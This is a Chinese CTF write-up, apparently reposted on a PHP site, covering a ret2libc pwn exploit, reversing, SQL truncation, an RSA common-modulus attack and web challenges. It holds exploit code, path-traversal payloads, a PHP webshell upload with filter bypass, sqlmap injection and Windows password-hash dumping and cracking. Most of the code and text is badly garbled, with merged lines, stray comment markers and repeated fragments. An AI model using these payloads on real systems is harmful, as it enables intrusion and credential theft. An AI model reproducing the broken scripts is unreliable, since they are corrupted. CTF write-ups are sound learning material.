如何分析CTF題的writeup

這是一道比較簡單的PWN題目，首先拖到IDA裡簡單看了一下程序，如圖

發現在讀取，沒有堆疊保護，所以，在read0x34時，可能會替換game返回址址，先透過write(1,write,4)(game作為write回傳地址)。這樣讀出write位址，這樣就可以得到system位址，因為又循環運作了，同樣在0x804A06C寫入/bin/sh\0,這樣system就能運作。

Pythonexp如下：

frompwn import *

#defrungameAgainPoc(p,yourname,flag):

   p.recvuntil("First,what's your name? \n")

   p.send(yourname "\n")

   p.recvuntil("doyou want to get flag?\n")

   p.send (flag)

pwnelf= ELF("./pwn")

libcelf= ELF("./libc-2.23.so")

#gameadd= 0x080485CB

！

#plt_write= pwnelf.symbols['write']

got_write= pwnelf.got['write']

#p= process('./pwn',env={ 'LD_PRELOAD':'./libc-2.23.so'})

p= remote('117.50.60.184', 12345)

rungameAgainPoc(p,"ichuqiu","0" *32 p32(plt_write)

               p32(gameadd) p32(1) p32(got_write)  p32(4))

write_addr. ##print"pwn write " ,hex(write_addr)

libcelf_system_add= libcelf.symbols["system"]

              write_addr- libcelf.syms[ print"pwn libcelf_system_add",hex(libcelf_system_add)

rungameAgainPoc(p,"/bin/sh\0","0"*32

              p32(celcel) p. 0x804A06C))

p.interactive()

flag{62c51c85-1516-4ad8-989c-58ce8c29642e}

，發現有一個循環比較

初步判斷，是一個8位數，於是分開比較

#[ebp var_6C]01050D02070106010206000B07010C06

#[ebp var_4C]02080602

#[ebp var_5C]0100070D020108080D000103040D0303

##[ebp var_48]0#40D0 ##defcover(buf):

   buf= buf.decode("hex")

   rbuf= ""

   fori in range(len(buf) - 1, -1,-1):

       rbuf = buf[i]

   returnrbuf

defcover_hex_lines(buf):

   returnbuf.replace("",## "").replace("\r","").replace("\n","").decode("hex")

var_6c=cover("01050D02070106010206000B07010C06")  

##        cover("0100070D020108080D000103040D0303")

        cover("02080602")##        cover("02080602")##        cover("02080602")##        cover("02080602")##    50 0D02")

#printlen(var_6c)

byte_402178= """02 02 02 02 03 01 01 02

0101 02 01 01 00 01 01  02 02 00 01 01 00 01 01  02 02 00 01 01 01 01 01 0102 02 00 01 01 01 01# 0101120102 01 02  02 01 01 01 01 01 02 01

0103 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00#100 1 02 0D 07 00 01

060C 01 07 0B 00 06 02  01 06 01 07 02 0D 05 01

0000 00 00 EF 28 68 5000 4800 00 00 E4 22 00 00  E4 16 00 00 00 00 00 00

EF28 68 5B 00 00 00 00  0C 00 00 00 10 00 00 00 00 00  00 00 00 00 EF 28 68 5B

0000 00 00 0D 00 00 00  54 02 00 00 40 23 00 00

4017 00 0 00

0E00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

A000 00 00 00 00 00 00

#A000 00 00 00 00 00 00

#A000 00 000000# 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00000 000# 0 00 00 00 00 30 40 00

E022 40 00 01 00 00 00  E8 20 40 00 00 00 00 00

0000 00 00 00 00 00 00  00 01 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00 0#0#0000 00# 00 00 00  00 00 00 00 00 00 00 00

0000 00 00 00 00 00 00  00 00 00 00 00 00 00 00"""#replace"#. ("\r","").replace("\n","").decode("hex")

byte_402138= """00 00 00 00 01 00 00 00

## ##0200 00 00 03 00 00 00  04 00 00 00 05 00 00 00######0600 00 00 07 00 00 00 0#08 0090 00 07 000# 00 00 00  0C 00 00 00 0D 00 00 00######0E00 00 00 0F 00 00 00"""###

.replace("","").replace("\r","").replace("\n","").decode("hex")

dword_403018=" ""0200 00 00 02 00 00 00

0200 00 00 02 00 00 00  00 00 00 00 00 00 00 00##place#place#"".re.(place#" ("\r","").replace("\n","").decode("hex")

#text:0040110E                mov    ecx, [ebp var_4]

.text:00401111                xor    ecx, ebp

.text:00401113     111D                mov    dword_403020, 6

#.text:00401127 mov    dword_403024, 7

#記憶體值有改變，所以修改一下

dword_403018= dword_403018[0:4] '\x03' dword_403018[5:8]

## '\x06' dword_403018[9:12]   '\x07'

          dword_403018[13:]

printdword_403018.encode("hex")

printdword_403018.encode("hex")

dword_403018.encode("hex") ,42):

   hightnum= ord(dword_403018[ord(byte_402178[i])*4])

   numbershow= hightnum ord(byte_402138[#   numbershow= hightnum ord(byte_402138[ ])*4])

   printchr(numbershow),

#flag{06b16a72-51cc-4310-88ab-70ab68290e22}

#0x03 sqli

#0x03 sqli

#0x03 sqli

#0x03 sqli

#0x03 sqli

#0x03 sqli

#0x03 sqli

#C問題。是sql約束攻擊，註冊用戶名為“admin   ”，密碼為符合規定的密碼就可以，然後登陸就能看到flag

flag{b5a1f9c5-ac30-4e88-b460-e90bcb65bd70}

0x04 RSA

opensslrsa -inform PEM -in pubkey1.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

   00:89:89:a3:98:98:84:56:b3:fe:f4:a6:ad:86:df:

   3c:99:57:7f:89:78: 04:8d:e5:43:6b:ef:c3:0d:8d:

   8c:94:95:89:12:aa:52:6f:f3:33:b6:68:57: 30:6e:

   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3: f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54: ea:f8:93:41:14:7a:

   dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8:6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b: d6:b5:f3:22:b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c: e3:e0:17:

   03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

   79: b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b:d9:

   ee:66:b1:5a:ff:23:3f:c7: 7b:55:8a:48:7d:a5:95:

   2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

   e3:6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

#   e7:24:81:db: 25:68:aa:82:9e:ea:c8:7d:20:1a:5a:

   8f:f5:ee:6f:0b:e3:81:92:ab:28:39: 63:5f:6c:66:

   42:17

Exponent:2333 (0x91d)

opensslrsa -inform PEM -in pubkey2.pem -pubin -text

opensslrsa -inform PEM -in pubkey2.pem -pubin -text

Public-Key:(2048 bit)

Modulus:

   00:89:89:a3:98:98:84:56:b3:fe:f4:a6: ad:86:df:

   3c:99:57:7f:89:78:04:8d:e5:43:6b:ef:c3:0d:8d:

#   8c: 94:95:89:12:aa:52:6f:f3:33:b6:68:57:30:6e:

   bb:8d:e3:6c:2c:39:6a:84: ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75:02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41:14:7a:

   dc:dd:4e:95: 0f:ff:74:e3:0b:be:62:28:76:b4:2e:

   ea:c8:6d:f4:ad:97:15:d0:5b:56:04: aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22:b2:b5:72:8b:a1:48:

# 70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

   03:f0:4f:94:a4:31:d9: 95:4b:d7:ae:2c:7d:d6:e8:

   79:b3:5f:8a:2d:4a:5e:fb:e7:37:25:7b:f9:9b: d9:

   ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48:7d:a5:95:######   2f:be:2b: 92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:######   e3:6a:5e:d8:2d:5c:1b:2a:eb:0e: 45:be:e4:05:cb:######   e7:24:81:db:25:68:aa:82:9e:ea:c8:7d:20:1a:5a:#### ##   8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66:######   42:17######Exponent:23333#   42:17######Exponent:23333#   42:17######Exponent:23333# (0x5b25).######可見，這兩個公鑰n是一樣的，只是e不同，使用RSA的共模攻擊######Python如下：######fromlibnum import n2s ,s2n######fromgmpy2 import invert######importbase64######importgmpy2######defbignumber(n):######   n= n.decode("hex ")######   rn= 0######   forb in n:######       rn= #lt;   bb:8d:e3:6c:2c:39:6a:84:ef:dc:5d:38:25:02:da:

   a1:a3:f3:b6:e9:75 :02:d2:e3:1c:84:93:30:f5:b4:

   c9:52:57:a1:49:a9:7f:59:54:ea:f8:93:41 :14:7a:

dc:dd:4e:95:0f:ff:74:e3:0b:be:62:28:76:b4:2e:

ea:c8 :6d:f4:ad:97:15:d0:5b:56:04:aa:81:79:42:

   4c:7d:9a:c4:6b:d6:b5:f3:22 :b2:b5:72:8b:a1:48:

   70:4a:25:a8:ef:cc:1e:7c:84:ea:7e:5c:e3:e0:17:

  03:f0:4f:94:a4:31:d9:95:4b:d7:ae:2c:7d:d6:e8:

# 79:b3:5f:8a:2d :4a:5e:fb:e7:37:25:7b:f9:9b:d9:

     ee:66:b1:5a:ff:23:3f:c7:7b:55:8a:48 :7d:a5:95:

2f:be:2b:92:3d:a9:c5:eb:46:78:8c:05:03:36:b7:

# e3 :6a:5e:d8:2d:5c:1b:2a:eb:0e:45:be:e4:05:cb:

  e7:24:81:db:25:68:aa:82 :9e:ea:c8:7d:20:1a:5a:

8f:f5:ee:6f:0b:e3:81:92:ab:28:39:63:5f:6c:66 :42:17"""

    .replace(":",").replace("",").replace("\r",").replace("\n" ,"" )

##printn

n =bignumber(n)

printhex(n)

e1= 2333

#e2 =23333

defegcd(a,b):

   ifa == 0:

       return(b,0,1)

   else:

       g,y,x=egcd(b%a,a)

       return(g,x - (b //a)*y,y)

#flag1 = base64 .b64decode (open("flag1.enc","rb").read())

flag2 = base64.b64decode(open("flag2.enc","rb").read())

c1= s2n(flag1)

c2= s2n(flag2)

c2= 反轉(c2,n)

##s= egcd(e1, e2)

#列印

s =gmpy2.gcdext(e1,e2)

##列印

s1= s[1]

s2= 0 - s[2]

prints1

prints2

m =pow(c1,s1,n) * pow(c2,s2,n) % n

printn2s(m)

flag{4b0b4c8a-82f3-4d80-902b-8e7a5706f8fe} 

0x05 拋磚引玉

#1.根據版本，

1.根據版本，##在wooyun鏡像站找到漏洞細節，

網站存在註入，但是資料庫使用者表為空，另外發現發現檔案下載漏洞，

down.php?urls=data/../config .php

下載檔案發現DB_user/mvoa使用者的密碼

define('DB_PWD','B!hpp3Dn1.');

flag值：B!hpp3Dn1.

2.http://url/www.zip，取得網站備份文件，在config.php中找到DB_user/root使用者的密碼

define('DB_PWD','mypasswd' );

flag值：mypasswd

0x06暗度陳列

1.發現下載路徑

/u-are-admin/download.php?dl=

顯示檔案查找（u-Are-Admin/u-upload-file資料夾），找到關鍵目錄/u-Are-Admin/

flag值：/u-Are-Admin /

2.在/u-Are-Admin/目錄，可以上傳文件，上傳Php（大小寫繞過）文字木馬，菜刀鏈接，netuser查看系統管理員Hack用戶的全名

flag: Hacked356

3.c771f

0x07瞞天過海

## 1 1awvs 掃到注入點

##/Cat.php? ID = 2

## SQLMAP 直接功能， ， 透過即刻取得後台明文密碼， ， ， ， ， ， ， ， ， ， ， ， ， serverlog

flag 值：serverlog

#2.注入root的密碼hash，

*21C5210729A90C69019F01FED76FAD4654F27167

然後cmd5解密得rootserver

#flag值：rootserver

3.內容

/classes/downloadfile .php?file=../../../../../../password.txt

flag值：c9c35cf409344312146fa7546a94d1a6

#0x08 偷梁換柱換柱

# 1.AWVS掃到./git源碼洩露，用工具GitHack下載所有源碼，在資料庫檔案中找到用戶名，密碼（adminAdmin@pgsql）

flag值：Admin@pgsql

2 .掉小，即使檔案真正地址，

/admin/uploads/111.php.png

# 。

3. 菜刀能夠直接查看/tmp/access 16位元

##0x09 .log的內容的前16位元

0x09 ，然後getshell，建構路徑為

url/info/include.php?filename=..//sjk-uploads/UareHack.txt

#密碼是a，得到shell取得可以phpStudy目錄下Documents.txt的內容

2.取得shell可以取得ichunqiu使用者桌面根目錄password.txt的內容

3.getshell後，傳msf木馬無法反彈，最後使用QuarksPwDump HASH，線上破解取得密碼

78beaa5511afa889b75e0c8d76954a50:4ffe895918a454ce0f872dad8af0b4da:::

flawe值：123q#

以上是如何分析CTF題的writeup的詳細內容。更多資訊請關注PHP中文網其他相關文章！